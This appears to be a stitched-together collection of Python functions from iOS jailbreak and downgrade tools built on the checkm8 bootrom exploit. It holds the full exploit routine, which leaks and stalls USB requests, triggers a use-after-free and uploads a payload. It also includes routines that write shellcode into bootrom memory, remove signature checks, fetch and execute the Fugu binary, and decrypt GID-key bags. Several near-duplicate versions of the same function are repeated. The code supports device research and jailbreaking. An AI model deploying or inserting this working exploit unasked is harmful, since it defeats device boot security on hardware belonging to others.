def pwndfumode_TEST(): # os.chdir("resources/ipwndfu") device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) # CPID:8960' in serial_number: # my1 # runexploit = checkm8.exploit() cmd = 'ipwndfu_geohot/ipwndfu -p' so = subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL) runexploit = so.returncode if runexploit: print("Exploit worked!") os.chdir("../resources/ipwndfu") removesig() else: print('\033[91m' + "Exploit failed =(" + '\033[0m') exit(99)
def xsigpatch(): device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) device = usbexec.PwnedUSBDevice() HEAP_BASE = 0x1801E8000 HEAP_WRITE_OFFSET = 0x5000 HEAP_WRITE_HASH = 0x10000D4EC HEAP_CHECK_ALL = 0x10000DB98 HEAP_STATE = 0x1800086A0 NAND_BOOT_JUMP = 0x10000188C BOOTSTRAP_TASK_LR = 0x180015F88 DFU_BOOL = 0x1800085B0 DFU_NOTIFY = 0x1000098B4 DFU_STATE = 0x1800085E0 TRAMPOLINE = 0x180018000 block1 = struct.pack('<8Q', 0, 0, 0, HEAP_STATE, 2, 132, 128, 0) block2 = struct.pack('<8Q', 0, 0, 0, HEAP_STATE, 2, 8, 128, 0) device = usbexec.PwnedUSBDevice() device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET, block1) device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x80, block2) device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x100, block2) device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x180, block2) device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET) device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x80) device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x100) device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x180) device.execute(0, HEAP_CHECK_ALL) print('Heap repaired.') device.write_memory(TRAMPOLINE + 0x400, open('bin/0x8015.bin').read()) device.execute(0, 0x180018400) print('Bootrom Patched')
def __init__(self): self.config = None self.platform = None device = dfu.acquire_device() self.serial_number = device.serial_number dfu.release_device(device) for dp in device_platform.all_platforms: if self.serial_number.startswith('CPID:%04x CPRV:%02x ' % (dp.cpid, dp.cprv)): self.platform = dp break if self.platform is None: print(self.serial_number) print('ERROR: No matching usbexec.platform found for this device.') sys.exit(1) info = self.read_memory(self.image_base() + 0x200, 0x100) for config in configs: if config.match(info): self.config = config break if self.config is None: print(info) print('ERROR: No matching usbexec.config found for this image.') sys.exit(1)
def pwndfumode(): os.chdir("resources/ipwndfu") device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) removesig()
def getecid(): device = dfu.acquire_device() serial = device.serial_number with silence_stdout(): print(serial) try: found = re.search('ECID:(.+?) IBFL', serial).group(1) #print("Your ECID is :", found) return found except AttributeError: print('\033[91m' + "ERROR: Couldn't find ECID in serial" + '\033[0m')
def decryptKBAG(kbag: str): device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "CPID:8960" in serial_number or "CPID:8965" in serial_number or "CPID:8010" in serial_number or "CPID:8015" in serial_number: cmd = f'resources/ipwndfuX/ipwndfu --decrypt-gid={kbag}' # Tried to port the function to python3 but was far to difficult for some reason elif "CPID:8000" in serial_number or "CPID:8003" in serial_number or "CPID:7000" in serial_number or "CPID:7001" in serial_number: cmd = f'resources/ipwndfuKeys/ipwndfu --decrypt-gid={kbag}' # Tried to port the function to python3 but was far to difficult for some reason else: print("Not supported...") exit(0) ivkey = os.popen(cmd).read() ivkey = re.sub(r'Decrypting with \w+ GID key\.', '', ivkey) ivkey = ivkey[1:-1] return ivkey
def pwndfumode(): os.chdir("resources/ipwndfu") device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if 'CPID:8960' in serial_number: runexploit = checkm8.exploit() if runexploit: print("Exploit worked!") removesig() else: print('\033[91m' + "Exploit failed =(" + '\033[0m') exit(99) elif 'CPID:8965' in serial_number: runexploit = checkm8.exploit() if runexploit: print("Exploit worked!") removesig() else: print('\033[91m' + "Exploit failed =(" + '\033[0m') exit(99) elif 'CPID:8950' in serial_number: print("iPhone 5 found!") os.chdir("..") print( '\033[91m' + "You need to have your 32 Bit device in normal mode, not DFU. Restart it and try again" + '\033[0m') exit(2) else: print('Found:', serial_number) print('\033[91m' + 'ERROR: This device is not supported.' + '\033[0m') exit(1)
def command(self, request_data, response_length): assert 0 <= response_length <= USB_READ_LIMIT device = dfu.acquire_device() assert self.serial_number == device.serial_number dfu.send_data(device, b'\0' * 16) device.ctrl_transfer(0x21, 1, 0, 0, 0, 100) device.ctrl_transfer(0xA1, 3, 0, 0, 6, 100) device.ctrl_transfer(0xA1, 3, 0, 0, 6, 100) dfu.send_data(device, request_data) # HACK if response_length == 0: response = device.ctrl_transfer(0xA1, 2, 0xFFFF, 0, response_length + 1, CMD_TIMEOUT).tostring()[1:] else: response = device.ctrl_transfer(0xA1, 2, 0xFFFF, 0, response_length, CMD_TIMEOUT).tostring() dfu.release_device(device) assert len(response) == response_length return response
def pwndfumodeKeys(): device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "CPID:8960" in serial_number: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfu") runexploit = checkm8.exploit() if runexploit: os.chdir("../..") else: print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8") input() pwndfumodeKeys () elif "CPID:8965" in serial_number: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfu") runexploit = checkm8.exploit() if runexploit: print("Exploit worked!") os.chdir("../..") else: print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8") input() pwndfumodeKeys() elif "CPID:8010" in serial_number: if "PWND:[checkm8]" in serial_number: print("Device already in PWNDFU mode, not re-running exploit..") return else: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfu8010") cmd = './ipwndfu -p' so = os.popen(cmd).read() print(so) if "ERROR: No Apple device" in so: print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8") input() pwndfumodeKeys() time.sleep(5) device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "PWND:[checkm8]" in serial_number: print("Exploit worked!") os.chdir("../..") time.sleep(5) return elif "CPID:8015" in serial_number: if "PWND:[checkm8]" in serial_number: print("Device already in PWNDFU mode, not re-running exploit..") return else: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfuX") cmd = './ipwndfu -p' so = os.popen(cmd).read() print(so) if "ERROR: No Apple device" in so: print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8") input() pwndfumodeKeys() os.chdir("../..") time.sleep(5) # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "PWND:[checkm8]" in serial_number: print("Exploit worked!") return else: print("Exploit failed...\nReboot and try again...") exit(2) elif "CPID:8000" in serial_number or "CPID:8003" in serial_number or "CPID:7000" in serial_number or "CPID:7001" in serial_number: if "PWND:[checkm8]" in serial_number: print("Device already in PWNDFU mode, not re-running exploit..") return else: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfuKeys") cmd = './ipwndfu -p' so = os.popen(cmd).read() print(so) if "ERROR: No Apple device" in so: print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8") input() pwndfumodeKeys() os.chdir("../..") time.sleep(5) # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "PWND:[checkm8]" in serial_number: print("Exploit worked!") return else: print("Exploit failed...\nReboot and try again...") exit(2) return else: print("Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP") exit(2)
def pwndfumode(): device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "CPID:8960" in serial_number: if not os.path.exists("pwnedDFU"): os.chdir("resources/bin") cmd = './pwnedDFU -p -f' so = os.popen(cmd).read() if "Device is now in pwned DFU mode!" in so: print("Exploit worked!") os.chdir("../..") return else: print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8") input() os.chdir("../..") pwndfumode() elif "CPID:8965" in serial_number: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfu") runexploit = checkm8.exploit() if runexploit: print("Exploit worked!") cmd = 'python2.7 rmsigchks.py' so = os.popen(cmd).read() print(so) os.chdir("../..") else: print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8") input() pwndfumode() elif "CPID:8010" in serial_number: # I don't want to bundle Fugu just to make sure that people know it hasnt been modified # I'd rather just quickly download the binary from Linus's github if it hasnt been already to avoid any issues if os.path.exists("resources/Fugu_8010/Fugu"): pass else: os.mkdir("resources/Fugu_8010") print("Downloading latest Fugu release from LinusHenze's github...") if os.path.exists("fugu.zip"): os.remove("fugu.zip") url = "https://github.com/LinusHenze/Fugu/releases/download/v0.4/Fugu_v0.4.zip" r = requests.get(url, allow_redirects=True) open('fugu.zip', 'wb').write(r.content) if os.path.exists("fugu"): shutil.rmtree("fugu") os.mkdir("fugu") else: os.mkdir("fugu") shutil.move("fugu.zip", "fugu/fugu.zip") os.chdir("fugu") with ZipFile('fugu.zip', 'r') as zipObj: zipObj.extractall() os.chdir("../") shutil.move("fugu/fugu", "resources/Fugu_8010/Fugu") shutil.move("fugu/shellcode", "resources/Fugu_8010/shellcode") st = os.stat('resources/Fugu_8010/Fugu') os.chmod('resources/Fugu_8010/Fugu', st.st_mode | stat.S_IEXEC) shutil.rmtree("fugu") print("Fugu has now been installed!") if "PWND:[checkm8]" in serial_number: print("Device already in PWNDFU mode, not re-running exploit..") return else: if not os.path.exists("Fugu"): os.chdir("resources/Fugu_8010") cmd = './Fugu rmsigchks' so = os.popen(cmd).read() #print(so) if "Exploiting iDevice: FAILED!" in so: print("Exploit failed, however re-expoilting without rebooting might work. Attempting now...") pwndfumode() if "Device could not be found!" in so: print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8") input() pwndfumode() time.sleep(5) device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "PWND:[checkm8]" in serial_number: print("Exploit worked!") os.chdir("../..") time.sleep(5) return elif "CPID:8015" in serial_number: if "PWND:[checkm8]" in serial_number: print("Device already in PWNDFU mode, not re-running exploit..") return else: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfuX") cmd = './ipwndfu -p' so = os.popen(cmd).read() print(so) if "ERROR: No Apple device" in so: print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8") input() pwndfumode() cmd = './ipwndfu --patch' so = os.popen(cmd).read() print(so) os.chdir("../..") time.sleep(5) # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "PWND:[checkm8]" in serial_number: print("Exploit worked!") return else: print("Exploit failed...\nReboot and try again...") exit(2) elif "CPID:8000" in serial_number: cmd = './resources/bin/eclipsa8000' so = os.popen(cmd).read() print(so) print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot") return elif "CPID:8003" in serial_number: cmd = './resources/bin/eclipsa8003' so = os.popen(cmd).read() print(so) print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot") return elif "CPID:7000" in serial_number: cmd = './resources/bin/eclipsa7000' so = os.popen(cmd).read() print(so) print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot") return elif "CPID:7001" in serial_number: cmd = './resources/bin/eclipsa8000' so = os.popen(cmd).read() print(so) print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot") return else: print("Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP") exit(2)
def pwndfumode(): device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "CPID:8960" in serial_number: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfu") runexploit = checkm8.exploit() if runexploit: print("Exploit worked!") cmd = 'python2.7 rmsigchks.py' so = os.popen(cmd).read() print(so) os.chdir("../..") else: print( "Exploit failed, reboot device into DFU mode and press enter to re-run checkm8" ) input() pwndfumode() elif "CPID:8965" in serial_number: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfu") runexploit = checkm8.exploit() if runexploit: print("Exploit worked!") cmd = 'python2.7 rmsigchks.py' so = os.popen(cmd).read() print(so) os.chdir("../..") else: print( "Exploit failed, reboot device into DFU mode and press enter to re-run checkm8" ) input() pwndfumode() elif "CPID:8010" in serial_number: if "PWND:[checkm8]" in serial_number: print("Device already in PWNDFU mode, not re-running exploit..") return else: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfu8010") cmd = './ipwndfu -p' so = os.popen(cmd).read() print(so) if "ERROR: No Apple device" in so: print( "Exploit failed, reboot device into DFU mode and press enter to re-run checkm8" ) input() pwndfumode() time.sleep(5) device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "PWND:[checkm8]" in serial_number: print("Exploit worked!") cmd = 'python2.7 rmsigchks.py' so = subprocess.Popen(cmd, shell=True) print(so) os.chdir("../..") time.sleep(5) return elif "CPID:8015" in serial_number: if "PWND:[checkm8]" in serial_number: print("Device already in PWNDFU mode, not re-running exploit..") return else: if not os.path.exists("checkm8.py"): os.chdir("resources/ipwndfuX") cmd = './ipwndfu -p' so = os.popen(cmd).read() print(so) if "ERROR: No Apple device" in so: print( "Exploit failed, reboot device into DFU mode and press enter to re-run checkm8" ) input() pwndfumode() cmd = './ipwndfu --patch' so = os.popen(cmd).read() print(so) os.chdir("../..") time.sleep(5) # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed device = dfu.acquire_device() serial_number = device.serial_number dfu.release_device(device) if "PWND:[checkm8]" in serial_number: print("Exploit worked!") return else: print("Exploit failed...\nReboot and try again...") exit(2) elif "CPID:8000" in serial_number: cmd = './resources/bin/eclipsa8000' so = os.popen(cmd).read() print(so) print( "Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot" ) return elif "CPID:8003" in serial_number: cmd = './resources/bin/eclipsa8003' so = os.popen(cmd).read() print(so) print( "Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot" ) return elif "CPID:7000" in serial_number: cmd = './resources/bin/eclipsa7000' so = os.popen(cmd).read() print(so) print( "Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot" ) return elif "CPID:7001" in serial_number: cmd = './resources/bin/eclipsa8000' so = os.popen(cmd).read() print(so) print( "Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot" ) return else: print( "Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP" ) exit(2)
def exploit(): #print('*** checkm8 exploit by axi0mX ***') #print('*** modified version by Linus Henze ***') #print('*** s5l8965x support by Matthew Pierson ***') device = dfu.acquire_device() start = time.time() print('Found:', device.serial_number) if 'PWND:[' in device.serial_number: print('Device is already in pwned DFU Mode. Not executing exploit.') return True payload, config = exploit_config(device.serial_number) if config.large_leak is not None: usb_req_stall(device) for i in range(config.large_leak): usb_req_leak(device) usb_req_no_leak(device) else: stall(device) for i in range(config.hole): no_leak(device) leak(device) no_leak(device) dfu.usb_reset(device) dfu.release_device(device) device = dfu.acquire_device() device.serial_number libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, b'A' * 0x800, 0.0001) # Advance buffer offset before triggering the UaF to prevent trashing the heap libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, 'A' * config.overwrite_offset, 10) libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0) dfu.release_device(device) time.sleep(0.5) device = dfu.acquire_device() usb_req_stall(device) if config.large_leak is not None: usb_req_leak(device) else: for i in range(config.leak): usb_req_leak(device) libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, config.overwrite, 50) for i in range(0, len(payload), 0x800): libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, payload[i:i + 0x800], 50) dfu.usb_reset(device) dfu.release_device(device) device = dfu.acquire_device() if 'PWND:[checkm8]' not in device.serial_number: print('ERROR: Exploit failed. Device did not enter pwned DFU Mode.') sys.exit(1) print('Device is now in pwned DFU Mode.') print('(%0.2f seconds)' % (time.time() - start)) dfu.release_device(device) return True